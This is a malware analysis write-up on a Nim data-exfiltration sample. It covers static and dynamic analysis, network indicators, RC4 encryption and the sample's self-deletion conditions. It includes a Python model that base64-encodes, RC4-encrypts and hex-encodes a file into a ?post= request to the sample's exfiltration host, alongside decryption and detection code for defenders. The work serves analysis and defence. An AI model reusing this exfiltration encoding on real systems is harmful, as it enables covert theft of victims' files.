Data Exfiltration Malware: Unraveling the Mystery

Static Analysis, Dynamic Analysis & Reverse Engineering of Data Exfiltration Malware

In the ever-evolving digital landscape, data exfiltration malware is the shadowy intruder that quietly siphons away sensitive information. With a keen eye for detail, we're about to unravel its secrets and expose its true nature.

File Hash & VT Analysis: Unveiling the Bad Boys

Our adventure kicks off with the sample's SHA-256 hash, as reported by sha256sum: 3aca2a08cf296f1845d6171958ef0ffd1c8bdfc3e48bdd34a605cb1f7468213e *unknown.exe.malz. With a 43/72 detection ratio in VirusTotal, it's clear that this binary is no ordinary piece of code. It's time to dig deeper.

Architecture and Language:

The sample is a 64-bit PE binary written in Nim, which already shapes how we read its strings and disassembly. But what lies beneath the surface of this digital enigma? Let's dive into the world of this covert operator.

Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries

As we examine the binary, the output of strings and FLOSS reveals intriguing details: a URL, the filename cosmo.jpeg, a file path, and a mysterious name, Houdini, all provide valuable clues. It's evident that the binary is up to something, but we're just scratching the surface.

IAT & PE View:

Suspicious API calls in the import table, including GetCurrentProcessId, GetCurrentThreadId, TerminateProcess, and VirtualProtect, raise our suspicions. The plot thickens as we delve further into the digital labyrinth.

Basic Dynamic Analysis: The Plot Thickens

On initial detonation, with no network simulation in place, there are no glaring visual indicators, and the binary, known as "unknown.exe," mysteriously deletes itself. But when INetSim enters the scene, the plot takes an unexpected turn. While still lacking visual cues, the binary no longer vanishes, leaving us to wonder about its true purpose.

Network Signatures:

Our digital detective work uncovers intriguing network signatures.

The binary first makes a callback to the domain "update.ec12-4-109-278-3-ubuntu20-04.local." It then issues a GET request to "http://cdn.altimiter.local/feed?post=B69A1CF6853645A440A0337BA0FB38291DE0B01A07FC129199658DDD4C1286BE45FEA8851D9BC6BC34220A6466D404C49A988BD6895AF291136076CCAFA9," whose post parameter carries a long hex-encoded blob of encrypted data, adding to the complexity of our investigation.

When I edited the /etc/hosts file to map the initial callback hosts to my localhost, I observed that I was getting a callback on port 80.

Host Indicators: The Accomplices Revealed

The binary isn't just creating chaos; it's creating a "password.txt" file in the Public directory.

Additionally, it's opening and reading "cosmo.jpeg," hinting at data exfiltration.

Advanced Static Analysis: The Code Breaker's Dilemma

Our digital detective skills led us to the discovery that the sample encrypts data with RC4. With the password/key file in hand, we can follow the binary's routine for encrypting the contents of "cosmo.jpeg" before it leaves the host. The intricate dance of the encryption code unfolds.

I also observed another interesting function, houdini. It looks like this function is responsible for deleting the binary.

There are three conditions under which the binary deletes itself.

The first condition: if the initial callback domain is unavailable, or the binary otherwise fails to make contact with it, the binary deletes itself.

The second condition: if the network is lost during the exfiltration routine, or exfiltration is interrupted for any other reason, the binary deletes itself.

And finally, once the exfiltration subroutine completes, the binary deletes itself.

Summary:

  • If the binary contacts the initial callback domain successfully, exfiltration occurs.

  • After a successful check-in with this domain, the sample unpacks the passwrd.txt file into C:\Users\Public, opens a handle to cosmo.jpeg, base64 encodes the contents of the file, and begins the data encryption routine.

  • The first callback domain is http://update.ec12-4-109-278-3-ubuntu20-04.local, which is not present in the strings output.

  • Exfiltration is achieved with the http://cdn.altimiter.local domain.

  • Unknown.exe deletes itself under the following conditions:

    • If the executable is run and cannot make a successful connection to the initial callback URL (http://update.ec12-4-109-278-3-ubuntu20-04.local)

    • If the executable is interrupted in the middle of its exfiltration routine (i.e. if INetSim is shut off while the binary is exfiltrating data)

    • If the executable finishes its exfiltration routine
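To make the encryption and exfiltration chain from the summary (and the RC4 finding above) concrete, here is an added example that is not code from the sample or from this write-up: it models the base64 -> RC4 -> query-parameter pipeline, then inverts it from the defender's side to recover the original file from a captured request given the key. The hex encoding of the post= value is inferred from the captured URL, and the key bytes and image bytes are constructed placeholders, not values from the real sample.

```python
import base64
from urllib.parse import urlparse, parse_qs


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + PRGA). The same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_beacon(key: bytes, file_bytes: bytes) -> str:
    """Model of the observed pipeline: base64 the file, RC4 it, hex it into ?post=.
    Ordering follows the write-up's summary; hex encoding is assumed from the captured URL."""
    blob = rc4(key, base64.b64encode(file_bytes)).hex().upper()
    return f"http://cdn.altimiter.local/feed?post={blob}"


def recover_exfil(key: bytes, url: str) -> bytes:
    """Defender side: pull ?post= from a captured request and undo hex -> RC4 -> base64."""
    post = parse_qs(urlparse(url).query)["post"][0]
    return base64.b64decode(rc4(key, bytes.fromhex(post)), validate=True)


def looks_like_beacon(url: str, min_hex_len: int = 64) -> bool:
    """Cheap triage check for proxy logs: a GET whose post= value is a long, pure-hex blob."""
    post = parse_qs(urlparse(url).query).get("post", [""])[0]
    return len(post) >= min_hex_len and all(c in "0123456789abcdefABCDEF" for c in post)


# Constructed sample data (not taken from the real sample): a fake key file and fake image bytes.
SAMPLE_KEY = b"constructed-key-from-passwrd.txt"
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0" + b"not really cosmo.jpeg " * 3

if __name__ == "__main__":
    url = build_beacon(SAMPLE_KEY, SAMPLE_IMAGE)
    print(url[:72] + "...", looks_like_beacon(url))
    assert recover_exfil(SAMPLE_KEY, url) == SAMPLE_IMAGE
```

With the key recovered from the unpacked key file, the same recover_exfil call can be run over every post= value pulled from the pcap to reconstruct exactly what left the host.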

Conclusion:

Our journey through the world of data exfiltration malware has revealed an intricate web of covert operations. With a binary that erases itself under specific conditions, we're left with more questions than answers. In the realm of cybersecurity, remaining vigilant and inquisitive is essential to uncovering and thwarting such covert digital operations. Stay curious and stay safe, for the digital landscape is ever-evolving and filled with mysteries.
